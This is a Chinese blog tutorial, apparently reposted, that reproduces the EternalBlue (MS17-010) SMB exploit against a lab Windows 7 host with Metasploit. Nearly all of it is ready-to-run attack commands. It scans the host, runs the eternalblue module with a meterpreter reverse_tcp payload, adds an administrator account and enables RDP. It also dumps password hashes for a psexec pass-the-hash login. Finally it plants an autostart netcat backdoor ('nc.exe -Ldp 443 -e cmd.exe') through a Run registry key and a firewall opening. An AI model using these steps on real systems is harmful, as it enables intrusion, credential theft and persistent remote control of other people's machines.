美文网首页
【金典漏洞01】——— 永恒之蓝(ms17_010)

【金典漏洞01】——— 永恒之蓝(ms17_010)

作者: Caeser_CC | 来源:发表于2022-01-14 18:02 被阅读0次

    [top]

    1. 什么是永恒之蓝

    简单理解,就是恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。


    勒索病毒.jpeg
    蓝的来源.png

    2. 使用MSF复现永恒之蓝,拿到shell

    2.1本文整体思路

    整体流程.png

    2.2 包含内容

    入侵流程
    入侵后的远程桌面登录
    入侵后的账号密码登录后台运行
    入侵后的自启动木马植入,链接木马控制目标

    3. 开干

    目标:win7
    ip:192.168.1.21
    445端口开放

    攻击机:kali
    ip:192.168.1.22

    命令总结:

    拿下目标流程命令

    msfdb run 启动
    use auxiliary/scanner/smb/smb_ms17_010 使用扫描
    set RHOSTS 192.168.1.21 设置目标
    run 扫描
    use exploit/windows/smb/ms17_010_eternalblue 使用攻击
    set payload windows/x64/meterpreter/reverse_tcp 设置负载
    set RHOSTS 192.168.1.21 设置目标
    run 攻击
    shell 进入目标cmd中

    远程桌面登录

    getuid 查看权限
    shell 进入目标cmd
    chcp 65001 更改编码规则
    net user hack 123123 创建新用户
    net localgroup administrators hack /add 添加用户权限
    exit 退出cmd
    run post/windows/manage/enable_rdp NAEM=hack PASSWORD=123123 启动远程登录功能
    rdesktop 192.168.1.21 kali新开rdp链接

    使用哈希值登录目标

    hashdump 获取hash密码
    background 后台运行
    use exploit/windows/smb/psexec 使用攻击模块
    set payload windows/meterpreter/reverse_tcp 设置负载
    show options 查看设置项
    set rhosts 192.168.1.21 设置目标ip
    set smbpass aad3b435b51404eeaad...... 设置哈希密码
    set smbuser Administrator 设置用户
    set lhost 192.168.1.22 本地ip
    run

    植入开机自启动木马,远程登录

    shell
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 开启UAC
    exit
    upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 nc后门程序放在目标上
    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' 设置后门开机自启动
    netsh firewall add portopening TCP 443 "hack443" ENABLE ALL cmd开启后门链接的443端口
    shutdown -r -f -t 0 重启目标,UAC、木马生效
    nc -v 192.168.1.21 443 NC链接
    connect 192.168.1.21 443 msf链接

    3.1 启动kali的msf扫描ms17_010漏洞

    1. 开启MSF:msfdb run 或 msfconsole

    启动成功.png

    2. 搜索ms17_010相关内容

    永恒之蓝相关模块.png

    3. 使用扫描模块扫描目标是否可被攻击

    1. 使用模块
    use 3 //前面的扫描结果序号
    

    或者

    use auxiliary/scanner/smb/smb_ms17_010
    
    1. 查看需要设置内容
      show options
      set RHOSTS 192.168.1.21
      需要设置的内容.png
    • Required 选项是yes的是必填选项
    • RHOSTS 目标的ip地址


      设置目标ip.png
    1. 开始扫描 runexploit
      存在漏洞.png

    4. 使用攻击模块(搜索处可查)

    1. 使用exp攻击模块 use exploit/windows/smb/ms17_010_eternalblue
      使用永恒之蓝攻击模块.png
    • 之前版本中需要单独set payload,现在版本默认设置了payload
    1. 设置payload set payload、设置目标ip
      设置payload.png
    • payload中默认的本地的ip所有不用再设置了

    5. 开始执行攻击

    runexploit

    攻击成功.png

    成功拿下这台机器!

    这里已经得到了这台机器的控制权,接下来是属于其他操作

    3.2 开启对目标的控制

    1. 远程桌面登录(目标会感知)

    • 前期准备


      前期准备.png
    • 启动后渗透
      run post/windows/manage/enable_rdp USERNAME=test PASSWORD=aabbcc
      开启后渗透,可远程桌面连接.png
    • kali远程登录
      rdesktop 192.168.1.21
      启动远程桌面登录.png
      登录页面.png
    • 正常情况下是可以直接登录了
    • 如果输入账号密码后提示权限不足则执行 net localgroup administrators new /add
    提升管理员权限.png

    再桌面登录
    登录成功


    远程登录成功.png

    2. 哈希值后台登录(后台运行,目标无感知)

    • 先获取哈希值hashdump 并后台运行 background
      [注意哈希是是红线标注部分,:*****::: 的 ***** 部分]
      得到哈希值.png
    • 设置攻击模块和负载模块,并且查看需要设置的内容
      use exploit/windows/smb/psexec
      set payload windows/meterpreter/reverse_tcp
      show options
      image.png
    • 设置相关内容
      set rhosts 192.168.1.21 设置目标ip
      set smbpass aad3b435b51404eeaad...... 设置哈希密码
      set smbuser Administrator 设置用户
      set lhost 192.168.1.22 本地ip
      设置攻击模块参数.png
    • 开始攻击 run
      攻击成功.png

    此时就是哈希密码登录目标

    3. 植入自启动后门程序,实现后台运行

    • 进入cmd 开启UAC,返回meterpreter
      shell
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
      exit
      开启UAC.png
    • 将nc后门程序放在目标上
      upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
      上传nc后门.png
    • 设置后门开机自启动,cmd开启后门链接的443端口

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

    netsh firewall add portopening TCP 443 "hack443" ENABLE ALL

    设置木马程序.png
    * 此时需要重启目标主机,重启后只要目标登录上了主机就可用nc或者msf远程直接链接,不需要exp
    • 目标重启后登录,分别使用NC和msf链接目标
      nc -v 192.168.1.21 443 NC链接
      connect 192.168.1.21 443 msf链接
      nc链接目标.png
      msf链接目标.png

    到此完结撒花

    相关文章

      网友评论

          本文标题:【金典漏洞01】——— 永恒之蓝(ms17_010)

          本文链接:https://www.haomeiwen.com/subject/dtencrtx.html